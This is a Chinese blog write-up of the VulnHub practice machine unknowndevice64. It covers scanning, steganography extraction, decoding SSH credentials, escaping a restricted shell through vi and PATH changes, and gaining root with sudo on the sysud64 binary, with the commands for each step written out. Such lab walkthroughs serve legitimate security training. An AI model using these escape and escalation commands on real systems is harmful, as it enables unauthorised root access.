unknowndevice64 v2.0靶场复现【附代码】(权限提升)

已于 2024-08-11 19:15:22 修改
阅读量287 收藏 5
点赞数 5
分类专栏: 打靶日常 文章标签: 经验分享 网络安全 笔记 网络 学习
于 2024-08-11 19:13:37 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_52487093/article/details/141109980
版权

靶机下载地址:

https://www.vulnhub.com/entry/unknowndevice64-1,293/icon-default.png?t=N7T8https://www.vulnhub.com/entry/unknowndevice64-1,293/

1. 主机发现+端口扫描+目录扫描+敏感信息获取

1.1. 主机发现

nmap -sn 192.168.7.0/24|grep -B 2 '08:00:27:BE:E8:F6'

1.2. 端口扫描

nmap 192.168.7.92 -p- -A

1.3. 目录扫描

dirb http://192.168.7.92:31337

1.4. 敏感信息获取

whatweb http://192.168.7.92:31337

2. WEB打点寻找可利用功能点

2.1. 进入http端口【u1s1这是我见过最新颖的一个靶机页面了】

1.老规矩,逐个点击功能点,测试可利用的功能点 ->暂无 -> 右击查看网页源代码,出现提示让我们去拼接

/key_is_h1dd3n.jpg

2.拼接/key_is_h1dd3n.jpg,右击图片另保存至本地;

3.在kali中使用 steghide 工具提取信息,需要密码,但是图片的文件名称可能为密码,试了几次确实是【h1dd3n】

***pass:如果你也像我没安装或者安装时出现问题,先更新以下驱动的库再试试安装steghide***

sudo apt update
apt-get install steghide

4.尝试解析密码【h1dd3n】

steghide extract -sf key_is_h1dd3n.jpg

打开看看,熟悉的Brainfuck加密

cat h1dd3n.txt

利用BerylEnigma工具解密 -> 得到账号密码【ud64:1M!#64@ud】

2.2. SSH连接+GetShell

连接ssh

ssh ud64@192.168.7.92 -p 1337
# 密码:1M!#64@ud

3. 权限提升

1.老规矩,查看当前用户的命令权限 -> 方式被禁用了

sudo -l

2.是rbash的shell -> 双击tab键,查看可执行命令

3.发现vi 和 export 命令可用,尝试vi 绕过,还是有部分命令无法执行

vi
shift+‘冒号’
!/bin/bash

4.配置环境变量

export PATH=/usr/sbin:/usr/bin:/sbin:/bin

sysud64 可以执行 root 权限的命令,直接尝试提权,但是失败了

sysud64 -h 查看帮助,发现可以使用-o参数

sysud64 -h

尝试提权

sudo sysud64 -o /dev/null /bin/bash

Kucei
关注
  • 5
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
靶机渗透—unknowndevice64
ray_kong的博客
04-04 4431
渗透unknowndevice64下载地址渗透IP扫描端口扫描http端口访问ssh端口访问rbash逃逸提权 下载地址 download unknowndevice64 地址:https://www.vulnhub.com/entry/unknowndevice64-1,293/ 渗透 IP扫描 sudo arp-scan -l //确定靶机IP地址 扫描到的靶机IP地址是 192.168.10.129 端口扫描 sudo nmap -p- 192.168.10.129 //靶机开放端口 sud
unknowndevice64-V1.0靶机渗透测试
m0_64769218的博客
09-17 201
打开之后的文件信息为一种brainfuck的程序语言,使用在线工具https://copy.sh/brainfuck/,或者https://www.splitbrain.org/services/ook在线解密后即可获取到ssh的用户名和密码;提示需要密码,图片名称为 key_is_h1dd3n,那么密码就是 h1dd3n,成功提取出了h1dd3n.txt;使用sudo-l查看sudo权限,发现可以无密码登录sysud64。使用sudo sysud64 -h查看帮助消息,发现可以使用。
unknowndevice64-V1.0
weixin_52953960的博客
08-09 115
显示需要密码,根据名字可以知道密码为 h1dd3n,得到一个h1dd3n.txt。发现很多命令被限制,是rbash的shell,双击tab键,查看可执行命令。sysud64 可以执行 root 权限的命令,直接尝试提权。访问图片,上面写着隐藏的秘密,可能是图片隐写。查看文件内容,是 brainfuck 加密。失败了,sysud64 -h 查看帮助。vi 绕过,还是有部分命令无法执行。f12查看源码,发现有一个图片。访问31337端口,没什么发现。export 配置环境变量绕过。使用工具解密,得到账号密码。
unknowndevice64-V1.0靶机
zdd1453691081的博客
08-09 159
代码unknowndevice64-V1.0靶机。
vulnhub系列:unknowndevice64-V1.0
jq_j37的博客
08-08 231
vulnhub系列:unknowndevice64-V1.0靶机,打靶文章
靶机渗透测试(unknowndevice64: 1)
@小张小张的博客
09-15 925
靶机渗透测试(unknowndevice64: 1): Vulnhub靶机 unknowndevice64: 1 靶机:修改靶机的网络配置为桥接模式。 攻击机:Kali虚拟机,同样使用桥接模式,即可访问靶机。 靶机难度:(中等) 目标:成功渗透进入靶机,获取root权限并且读取/root/flag.txt 。 渗透流程: 1.探测主机ip(netdiscover -i eth0 -r 网关) 2.nmap进行靶机端口服务扫描 nmap -sS -Pn -A -p- -n 靶机ip 发现
vulnhub之unknowndevice64-V1.0渗透实战
weixin_43862283的博客
04-15 476
vulnhub之unknowndevice64-V1.0渗透实战 0x01 环境及配置 难度:中级 目标:获取root权限并阅读/root/flag.txt 网络:桥接模式 DHCP自动分配IP地址 下载地址:https://mega.nz/#!WyQ1UaKC!azV9qvOXqzxOXFcE9qP15fQTEOWgr27plE0SmZTvGhk 靶机:192.168.34.152 攻击机:ka...
Vulnhub靶机 unknowndevice64-V1.0(渗透测试详解)
2301_78721909的博客
08-11 173
Vulnhub靶机 unknowndevice64-V1.0(渗透测试详解)
unknowndevice64: 1靶机
最新发布
hqy250019的博客
08-11 126
提示需要密码,图片名称为 key_is_h1dd3n,那么密码就是 h1dd3n,成功提取出了h1dd3n.txt;文件信息为一种brainfuck的程序语言,使用在线工具。[export命令用于设置或显示环境变量,在shell中执行程序时,shell会提供一组环境变量,export可新增,修改或删除环境变量]端口扫描,开放1337-ssh端口服务,31337-http端口服务;下载图片到本地,可使用kali中的工具steghid(开源隐写程序)查看源码,发现隐藏目录:Key_is_hidd3n.jpg。
计算机硬件查看软件UnknownDevice
02-28
UnknownDevice对计算机的所有硬件进行查看,方便好用。
无法识别USB设备,解决Unknown Device_亲测 网上的方法都试遍了,就这个成功了!.zip
01-09
标签“unknowndevice”和“windows”表明问题主要发生在Windows系统中,与未知设备相关。Windows系统在无法找到适配的驱动程序或者驱动程序出现问题时,会将设备识别为未知设备。 根据压缩包内的文件名称,我们可以...
unknown device驱动下载_手机usb2.0万能驱动程序
09-29
unknown device驱动下载_手机usb2.0万能驱动程序
中电信翼康济世数据中台基于Apache SeaTunnel构建数据集成平台经验分享
weixin_54625990的博客
08-07 793
Apache SeaTunnel作为一个高效、灵活的数据集成平台,在数据中台战略中扮演着重要角色。通过本文的介绍,读者可以了解如何基于SeaTunnel快速搭建数据集成平台,并在实际应用中灵活运用。未来,随着技术的不断发展,SeaTunnel将继续在数据集成领域发挥重要作用,助力企业实现数据驱动的业务变革。本文由白鲸开源科技提供发布支持!
全职独立开发经验分享
前端之虎陈随易
08-10 969
笔者认为,所谓的产品,并不必须是一个比较正式的软件,项目,工具。以上笔者折腾过的内容,我认为,都可以称之为产品。凡是能给他人他事,带来帮助和价值的,都可以是自己的产品。一个付费课程是产品吗?是的,它能让他人学会一门技术,知识。一个微信群,每天组织读书会,是产品吗?也是。做商业推广是产品吗?是的,产品就是自己,这是打造个人IP。那么,在阅读这篇文章之前呢,我们先对产品的定义,有一个基本的共识。本文先写到这里,如果你还有想了解的话题,我会在我的个人网站进行长期更新。
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8376
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
【OpenCV C++20 学习笔记】给图片加边框-copyMakeBorder
TeamLee的博客
08-06 607
简单介绍在OpenCV中如何用copyMakeBorder的方法给图片添加边框
尚硅谷谷粒商城项目笔记——四、使用docker安装redis【电脑CPU:AMD】
B6665X的博客
08-06 409
尚硅谷谷粒商城项目笔记——四、使用docker安装redis【电脑CPU:AMD】
尚硅谷谷粒商城项目笔记——三、安装docker【电脑CPU:AMD】
B6665X的博客
08-06 924
尚硅谷谷粒商城项目笔记——三、安装docker 电脑CPU:AMD
怎么修复unknowndevice
09-11
### 回答1: Unknown Device是指电脑在设备管理器中无法识别的未知设备。修复方法有以下几种: 1. 更新驱动程序:右键点击未知设备,选择“更新驱动程序”,尝试使用Windows更新或手动下载并安装适用于该设备的驱动程序。 2. 卸载并重新安装设备:右键点击未知设备,选择“卸载设备”,然后重启电脑。重新插入设备后,电脑将重新识别设备并尝试重新安装驱动程序。 3. 使用设备厂商提供的驱动程序:从设备的官方网站下载并安装针对该设备的最新驱动程序。 4. 检查硬件连接:检查设备和电脑之间的连接是否正常,尝试更换电源线、USB线或其他连接线。 5. 检查设备是否损坏:尝试将设备连接到另一台电脑或设备上,如果该设备仍然无法被识别,可能是设备自身出现故障。 总之,无论哪种方法,都需要仔细分析并一步一步进行试验,以确定最终解决方案。求助专业技术人员可能会更快地解决问题。 ### 回答2: 修复"unknowndevice"的方法取决于具体情况。根据问题的描述,可能是指电脑或移动设备无法识别或识别不出某个设备的错误。 首先,我们可以尝试以下方法来修复这个问题: 1. 重新连接设备:断开设备连接并重新连接,确保连接线是否牢固连接,并将其插入正确的端口或插槽。 2. 重启设备:有时,设备或计算机的重启可以解决无法识别设备的问题。尝试重启设备并查看是否可以解决问题。 3. 更新驱动程序:在设备管理器中查找问题设备,右键点击它并选择"更新驱动程序"。如果有可用的更新,请下载并安装它们,然后重新连接设备。 4. 更新操作系统:确保你的操作系统是最新的版本。更新操作系统可能会修复某些设备不被识别的问题。 5. 使用其他USB端口或电缆:有时,设备无法被识别可能是由于破损的USB端口或电缆引起的。尝试使用不同的USB端口或更换电缆来确认问题所在。 如果以上方法都无效,可能需要采取以下额外措施: 1. 参考设备或计算机的说明手册:查看设备或计算机的手册,以了解更多关于如何识别和连接特定设备的信息。 2. 参考设备制造商的网站:访问设备制造商的官方网站,查找关于修复特定设备的文档、驱动程序或其他支持信息。 3. 寻求专业帮助:如果问题仍然存在,可能需要寻求专业技术支持的帮助。联系设备制造商、计算机技术支持专家或维修中心以获取更多指导。 总之,修复"unknowndevice"的关键是找出具体的原因,并采取相应的措施进行修复。根据具体设备和情况,可能需要尝试多种方法来解决问题。 ### 回答3: 修复 "unknowndevice" 的具体步骤会根据问题的性质和出现该问题的具体设备而有所不同。这是由于 "unknowndevice" 是一个比较宽泛的错误描述,可指示许多不同类型的问题。以下是一些可能的修复步骤: 1. 驱动程序更新:首先,尝试更新相关设备的驱动程序。可以通过设备管理器或设备官方网站下载和安装最新的驱动程序版本。如果驱动程序过时或损坏,可能会导致设备被识别为 "unknowndevice"。 2. 连接检查:检查设备与计算机之间的所有连接,并确保它们正确插入。有些 "unknowndevice" 错误可能是由于不良或不稳定的连接导致的。 3. 重新启动设备和计算机:有时,重新启动设备和计算机可以解决 "unknowndevice" 错误。关闭设备并从电源中断供电,然后重新启动计算机。然后再次连接设备并检查错误是否已解决。 4. 执行设备故障排除:某些操作系统中都有设备故障排除工具,可以帮助识别和修复设备问题。尝试按照操作系统故障排除流程的指导进行检查。 5. 重新安装设备:如果上述方法都无效,可以考虑卸载设备,并重新安装。这可以通过设备管理器中的 "卸载设备" 选项来完成。然后再次连接设备,系统将自动重新安装该设备。 总之,修复 "unknowndevice" 错误需要根据具体情况采取相应的措施。如果问题仍然存在,可能需要咨询专业技术人员或设备制造商以获取更多帮助。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Kucei

感谢您的喜欢

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值